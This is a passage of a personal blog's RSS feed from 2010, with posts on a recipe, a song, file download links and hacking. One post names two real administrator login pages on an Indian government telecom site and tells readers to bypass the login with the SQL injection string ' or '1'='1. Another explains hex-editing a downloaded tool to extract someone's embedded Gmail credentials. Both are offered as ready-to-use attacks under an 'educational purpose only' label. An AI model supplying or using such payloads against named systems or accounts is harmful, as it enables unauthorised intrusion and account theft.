center;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span id="jsurl_file-download-head"&gt;&lt;a href="http://lnkgt.com/5vd"&gt;RAPIDSHARE LINK&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: &amp;quot;Helvetica Neue&amp;quot;,Arial,Helvetica,sans-serif; text-align: center;"&gt;&lt;pre id="line1" style="color: #274e13;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre id="line1"&gt;&lt;span style="font-size: large;"&gt;&lt;a href="http://lnkgt.com/5ve"&gt;&lt;b style="color: #274e13;"&gt;FILEFACTORY LINK &lt;/b&gt;&lt;/a&gt;&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="color: #073763; font-size: x-large;"&gt;&lt;b&gt;&lt;span id="jsurl_file-download-head"&gt;ENJOY..!&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt; &lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6804681555637047946-6937016668811965577?l=www.ashisharena.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/hPxPyU5ru46UKRJTMrTNAs4Omzo/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/hPxPyU5ru46UKRJTMrTNAs4Omzo/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/hPxPyU5ru46UKRJTMrTNAs4Omzo/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/hPxPyU5ru46UKRJTMrTNAs4Omzo/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/ashisharena/adCx/~4/UwOt93VxHdQ" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ashisharena/adCx/~3/UwOt93VxHdQ/videohive-after-effects-project-file.html</link><author>noreply@blogger.com (ArtistAshish)</author><thr:total>0</thr:total><feedburner:origLink>http://www.ashisharena.com/2010/12/videohive-after-effects-project-file.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6804681555637047946.post-3092056468646015270</guid><pubDate>Sun, 26 Dec 2010 17:15:00 +0000</pubDate><atom:updated>2010-12-26T09:30:41.009-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">scrambled</category><category domain="http://www.blogger.com/atom/ns#">indian</category><category domain="http://www.blogger.com/atom/ns#">cookie</category><category domain="http://www.blogger.com/atom/ns#">Easy</category><category domain="http://www.blogger.com/atom/ns#">eggs</category><category domain="http://www.blogger.com/atom/ns#">Wonderfull</category><category domain="http://www.blogger.com/atom/ns#">egg</category><category domain="http://www.blogger.com/atom/ns#">recipe</category><category domain="http://www.blogger.com/atom/ns#">cooking</category><category domain="http://www.blogger.com/atom/ns#">tango</category><category domain="http://www.blogger.com/atom/ns#">home</category><category domain="http://www.blogger.com/atom/ns#">hotel</category><category domain="http://www.blogger.com/atom/ns#">spanish</category><category domain="http://www.blogger.com/atom/ns#">amazing</category><category domain="http://www.blogger.com/atom/ns#">kitchen</category><category domain="http://www.blogger.com/atom/ns#">cousine</category><category domain="http://www.blogger.com/atom/ns#">omlette</category><category domain="http://www.blogger.com/atom/ns#">Tasty</category><category domain="http://www.blogger.com/atom/ns#">make</category><category domain="http://www.blogger.com/atom/ns#">food</category><title>Tango Spanish Style Scrambled Eggs by Ashish</title><description>So one of the Oldest Dishes made by me and Too Simple.. even a child can make it at Home. This is a Fusion of Indian and Spanish Taste and Cooking. And when I made this Dish first time.. I was quite Proud of myself. Come On.. I was just 13 Years old.. :P. In This Recipe...Tomatoes are doing the Magic.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_giHdRMRe1vc/TRdwClO9_jI/AAAAAAAAA2E/_uk5LVEPdAM/s1600/DSC00616.JPG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="150" src="http://1.bp.blogspot.com/_giHdRMRe1vc/TRdwClO9_jI/AAAAAAAAA2E/_uk5LVEPdAM/s200/DSC00616.JPG" width="200" /&gt; &lt;/a&gt;&lt;a href="http://1.bp.blogspot.com/_giHdRMRe1vc/TRdwClO9_jI/AAAAAAAAA2E/_uk5LVEPdAM/s1600/DSC00616.JPG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;span style="font-size: xx-small;"&gt;Sorry Low Quality Mobile Camera :P&lt;/span&gt; &lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;u&gt;&lt;b&gt;INGREDIENTS&lt;/b&gt;&lt;/u&gt;-&lt;/div&gt;&lt;ul&gt;&lt;li&gt;Eggs: 2&lt;/li&gt;&lt;li&gt;Tomatoes ( Medium Sized ): 2-3 Chopped&lt;/li&gt;&lt;li&gt;Onion ( Medium Sized ): 1 Chopped&lt;/li&gt;&lt;li&gt;Capsicum ( Medium Sized ): 1 Chopped&lt;/li&gt;&lt;li&gt;Green Chillies: 2 Cut into Half along length&lt;/li&gt;&lt;li&gt;Ginger: 20gms Chopped&lt;/li&gt;&lt;li&gt;Spring Onion: 1-2 Copped&lt;/li&gt;&lt;li&gt;Red Chili Powder: to Taste ( in my case I love Spicy :P)&lt;/li&gt;&lt;li&gt;Salt: to Taste&lt;/li&gt;&lt;li&gt;Cinnamon: 1 Teaspoon&lt;/li&gt;&lt;li&gt;Pepper: 1 Teaspoon&lt;/li&gt;&lt;li&gt;Olive Oil: 1 Tablespoon&lt;/li&gt;&lt;li&gt;Mustard Seeds: 9-10&lt;/li&gt;&lt;li&gt;Coriander Leaves&lt;/li&gt;&lt;/ul&gt;&lt;div style="text-align: center;"&gt;&lt;u&gt;&lt;b&gt;PROCEDURE:&lt;/b&gt;&lt;/u&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;ol style="text-align: left;"&gt;&lt;a href="http://www.blogger.com/post-edit.g?blogID=6804681555637047946&amp;amp;postID=3092056468646015270" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;script type="text/javascript"&gt;    hopfeed_affiliate='ashishshum';    hopfeed_affiliate_tid='';    hopfeed_cellpadding='5';    hopfeed_font='Verdana, Arial, Helvetica, Sans Serif';    hopfeed_font_size='9pt';    hopfeed_font_color='#000000';    hopfeed_tab1_title='Top Products';    hopfeed_tab2_title='Indian Food';    hopfeed_tab3_title='Cooking';    hopfeed_tab1_keywords='Top, cooking, cook, garnish';    hopfeed_tab2_keywords='indian, food, cooking, masala';    hopfeed_tab3_keywords='cook, international, cousines';    hopfeed_template_name='DEFAULT';    hopfeed_active_tab_color='#11527B';    hopfeed_inactive_tab_color='#D1DCEE';    hopfeed_active_tab_font_color='#FFFFFF';    hopfeed_inactive_tab_font_color='#000000';    hopfeed_hover_color='#D1DCEE';    hopfeed_border_color='#11527B';    hopfeed_align='left';    hopfeed_width='300';    hopfeed_rows='5';    hopfeed_fill_slots='true';    hopfeed_link_target='_blank';    hopfeed_path='http://ashishshum.hopfeed.com';&lt;/script&gt; &lt;script src="http://ashishshum.hopfeed.com/script/hopfeed_widget.js" type="text/javascript"&gt;&lt;/script&gt;  &lt;/a&gt;&lt;li&gt;Take a Pan and put Oil in it. wait for it to get Heated up.&lt;/li&gt;&lt;li&gt;Add Mustard Seeds and see the Magic. ( if you are new in Kitchen :P )&lt;/li&gt;&lt;li&gt;Add Onions, Ginger and Green Chili and Cinnamon&lt;/li&gt;&lt;li&gt;Wait for Onions to get Golden Brown and then add Tomato, Capsicum, Spring Onion.&lt;/li&gt;&lt;li&gt;&amp;nbsp;Add Salt, Red Chili Powder, Pepper.&lt;/li&gt;&lt;li&gt;Wait for Things to get along well and then Add two Eggs directly in it.&lt;/li&gt;&lt;li&gt;Beat the Eggs inside with Everything well.&lt;/li&gt;&lt;li&gt;When Egg gets Cooked Well turn Off the Gas Stove and Place the ready Eggs in a Plate&lt;/li&gt;&lt;li&gt;Garnish with Coriander Leaves. &lt;/li&gt;&lt;/ol&gt;&lt;b&gt;Taste Best with Tomato Sauce and also as filling in Sandwiches.&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;Enjoy Cooking..!&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6804681555637047946-3092056468646015270?l=www.ashisharena.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/GRNfTnFesxaxcnix-jPRWwpTesY/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/GRNfTnFesxaxcnix-jPRWwpTesY/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/GRNfTnFesxaxcnix-jPRWwpTesY/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/GRNfTnFesxaxcnix-jPRWwpTesY/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/ashisharena/adCx/~4/9KpQwnih8eI" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ashisharena/adCx/~3/9KpQwnih8eI/tango-spanish-style-scrambled-eggs-by.html</link><author>noreply@blogger.com (ArtistAshish)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_giHdRMRe1vc/TRdwClO9_jI/AAAAAAAAA2E/_uk5LVEPdAM/s72-c/DSC00616.JPG" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.ashisharena.com/2010/12/tango-spanish-style-scrambled-eggs-by.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6804681555637047946.post-4182823759936742059</guid><pubDate>Wed, 08 Dec 2010 09:55:00 +0000</pubDate><atom:updated>2010-12-08T01:55:22.321-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">vulnerable</category><category domain="http://www.blogger.com/atom/ns#">bypass</category><category domain="http://www.blogger.com/atom/ns#">mtnl</category><category domain="http://www.blogger.com/atom/ns#">Injection</category><category domain="http://www.blogger.com/atom/ns#">hacked</category><category domain="http://www.blogger.com/atom/ns#">amazing</category><category domain="http://www.blogger.com/atom/ns#">sqli</category><category domain="http://www.blogger.com/atom/ns#">vulnerability</category><category domain="http://www.blogger.com/atom/ns#">database</category><category domain="http://www.blogger.com/atom/ns#">SQL</category><category domain="http://www.blogger.com/atom/ns#">bsnl</category><category domain="http://www.blogger.com/atom/ns#">hack</category><category domain="http://www.blogger.com/atom/ns#">trick</category><title>BSNL website HACKED by Ashish :)</title><description>&lt;b&gt;BSNL Hacked by Simple SQLi .. Never thought this much BIG Govt. site will be vulnerabe to suach a Chindi thing :P&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img alt="http://www.topnews.in/files/BSNL-India-.jpg" src="http://www.topnews.in/files/BSNL-India-.jpg" /&gt;&lt;b&gt;&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: #990000;"&gt;See Yourself..&amp;nbsp; &lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;go here &lt;br /&gt;&lt;/b&gt;&lt;/i&gt;&lt;a href="http://ap.bsnl.co.in/mishelpdesk/admin.asp"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;LINK 1&lt;/b&gt;&lt;/span&gt;&lt;/a&gt;&lt;i&gt;&lt;b&gt;&lt;br /&gt;&lt;br /&gt;or&lt;br /&gt;&amp;nbsp;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;a href="http://dotsoft.bsnl.co.in/helpdesk/admin.asp"&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;LINK 2&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;i&gt;&lt;b&gt;&lt;br /&gt;&lt;br /&gt;simply  Enter &lt;br /&gt;&lt;br /&gt;&lt;span style="color: #008400;"&gt; ' or '1'='1 &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;In  password field&lt;br /&gt;&lt;br /&gt;and&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #840000;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style="color: #840000;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;i&gt;&lt;b&gt;&lt;span style="color: #840000;"&gt;&lt;span style="font-size: large;"&gt;ENJOY..!&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;i&gt;&lt;b&gt;&lt;span style="color: #840000;"&gt;&lt;span style="font-size: large;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;span style="color: #351c75; font-size: small;"&gt;&lt;b&gt;NOTE: It is for educational Purpose Only &lt;/b&gt;&lt;/span&gt;&lt;i&gt;&lt;b&gt;&lt;span style="color: #840000;"&gt;&lt;span style="font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6804681555637047946-4182823759936742059?l=www.ashisharena.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/3dmTADA2xnd-SfSzyQpPAkm_L1k/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/3dmTADA2xnd-SfSzyQpPAkm_L1k/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/3dmTADA2xnd-SfSzyQpPAkm_L1k/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/3dmTADA2xnd-SfSzyQpPAkm_L1k/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/ashisharena/adCx/~4/bSFGpGfmDgw" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ashisharena/adCx/~3/bSFGpGfmDgw/bsnl-website-hacked-by-ashish.html</link><author>noreply@blogger.com (ArtistAshish)</author><thr:total>0</thr:total><feedburner:origLink>http://www.ashisharena.com/2010/12/bsnl-website-hacked-by-ashish.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6804681555637047946.post-3769523161087159335</guid><pubDate>Sat, 04 Dec 2010 12:21:00 +0000</pubDate><atom:updated>2010-12-04T04:21:48.862-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">bewafayi</category><category domain="http://www.blogger.com/atom/ns#">senses</category><category domain="http://www.blogger.com/atom/ns#">Review</category><category domain="http://www.blogger.com/atom/ns#">lyrics</category><category domain="http://www.blogger.com/atom/ns#">amazing</category><category domain="http://www.blogger.com/atom/ns#">touching</category><category domain="http://www.blogger.com/atom/ns#">semi</category><category domain="http://www.blogger.com/atom/ns#">song</category><category domain="http://www.blogger.com/atom/ns#">sad</category><category domain="http://www.blogger.com/atom/ns#">bewafai</category><category domain="http://www.blogger.com/atom/ns#">teri. deep</category><title>TERI BEWAFAYI- Awesome Song by Deep SEnses</title><description>Amazing Punjabi Rap song&lt;br /&gt;Touched me in my Heart When I first Heard it&lt;br /&gt;I listen to it almost 10 times Everyday&lt;br /&gt;&lt;br /&gt;I bet If you have Loved Someone in your life... You will go mad for this song...&lt;br /&gt;&lt;br /&gt;&lt;object height="385" width="480"&gt;&lt;param name="movie" value="http://www.youtube.com/v/g7NAdtkvenA?fs=1&amp;amp;hl=en_US&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/g7NAdtkvenA?fs=1&amp;amp;hl=en_US&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="385"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;Please Leave Nice Comments if you like the Song&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6804681555637047946-3769523161087159335?l=www.ashisharena.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/KjLBnCkmBetxiTUHZJCchSZOyuQ/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/KjLBnCkmBetxiTUHZJCchSZOyuQ/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/KjLBnCkmBetxiTUHZJCchSZOyuQ/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/KjLBnCkmBetxiTUHZJCchSZOyuQ/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/ashisharena/adCx/~4/S4b3pbrIHgc" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ashisharena/adCx/~3/S4b3pbrIHgc/teri-bewafayi-awesome-song-by-deep.html</link><author>noreply@blogger.com (ArtistAshish)</author><thr:total>0</thr:total><feedburner:origLink>http://www.ashisharena.com/2010/12/teri-bewafayi-awesome-song-by-deep.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6804681555637047946.post-6789051296104686942</guid><pubDate>Sat, 06 Nov 2010 10:00:00 +0000</pubDate><atom:updated>2010-11-06T03:00:35.846-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">noob</category><category domain="http://www.blogger.com/atom/ns#">Easy</category><category domain="http://www.blogger.com/atom/ns#">password</category><category domain="http://www.blogger.com/atom/ns#">access</category><category domain="http://www.blogger.com/atom/ns#">new codes</category><category domain="http://www.blogger.com/atom/ns#">gnail</category><category domain="http://www.blogger.com/atom/ns#">hacked</category><category domain="http://www.blogger.com/atom/ns#">New</category><category domain="http://www.blogger.com/atom/ns#">amazing</category><category domain="http://www.blogger.com/atom/ns#">break</category><category domain="http://www.blogger.com/atom/ns#">email</category><category domain="http://www.blogger.com/atom/ns#">code</category><category domain="http://www.blogger.com/atom/ns#">account</category><category domain="http://www.blogger.com/atom/ns#">hack</category><category domain="http://www.blogger.com/atom/ns#">hacking</category><category domain="http://www.blogger.com/atom/ns#">Into</category><title>Guaranteed Method to Hack a gmail account</title><description>&lt;div style="color: black;"&gt;first get a hacking tool no need to worry where to  find just go to &lt;a href="http://www.youtube.com/"&gt;http://www.youtube.com&lt;/a&gt;  and search "Runescape Hacker" or "Runescape Hacker Download Link"&lt;br /&gt;&lt;br /&gt;you  will get the downloading link in comments zone&lt;br /&gt;&lt;br /&gt;now you have  downloaded the hacker tool but -Don't open the Runescape Hacker Tool, It  may be Backd00red Instead place it in a Safe area!&lt;br /&gt;&lt;br /&gt;download and  install hexworkshop now dont ask for link...google is your friend&lt;br /&gt;&lt;br /&gt;now  right click on tool ,,you will see "Edit this with HexWorkshop"...click  it&lt;br /&gt;&lt;br /&gt;you will see a mess of words and alphabets symbols....dont  worry dont get confused believe me its easy to do!&lt;br /&gt;&lt;br /&gt;now press  ctrl+f... a boz will appear&lt;br /&gt;&lt;br /&gt;-Now Before start Finding Anything  Make sure you change the "Hex" to "String" value.&lt;br /&gt;&lt;br /&gt;-Now Enter  "Gmail" to the Box and Hit "Find".&lt;br /&gt;&lt;br /&gt;-You will Get Popping Up a  Black area. Don't touch it. Instead see on your Right for the Texts.&lt;br /&gt;&lt;br /&gt;-Copy  the Highlighted text and Paste it in a Text document (Newly Created).&lt;br /&gt;&lt;br /&gt;-Remove  the [.]&amp;gt;DOTs and You will see The Email ID + the Passwd.&lt;br /&gt;&lt;br /&gt;Njoy  Hacking!!&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6804681555637047946-6789051296104686942?l=www.ashisharena.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/fzT86T_t5SXbiDAU8Dd6suUbW1M/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/fzT86T_t5SXbiDAU8Dd6suUbW1M/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/fzT86T_t5SXbiDAU8Dd6suUbW1M/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/fzT86T_t5SXbiDAU8Dd6suUbW1M/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/ashisharena/adCx/~4/dFuv4EgipdU" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ashisharena/adCx/~3/dFuv4EgipdU/guaranteed-method-to-hack-gmail-account.html</link><author>noreply@blogger.com (ArtistAshish)</author><thr:total>2</thr:total><feedburner:origLink>http://www.ashisharena.com/2010/11/guaranteed-method-to-hack-gmail-account.html</feedburner:origLink></item></channel></rss>

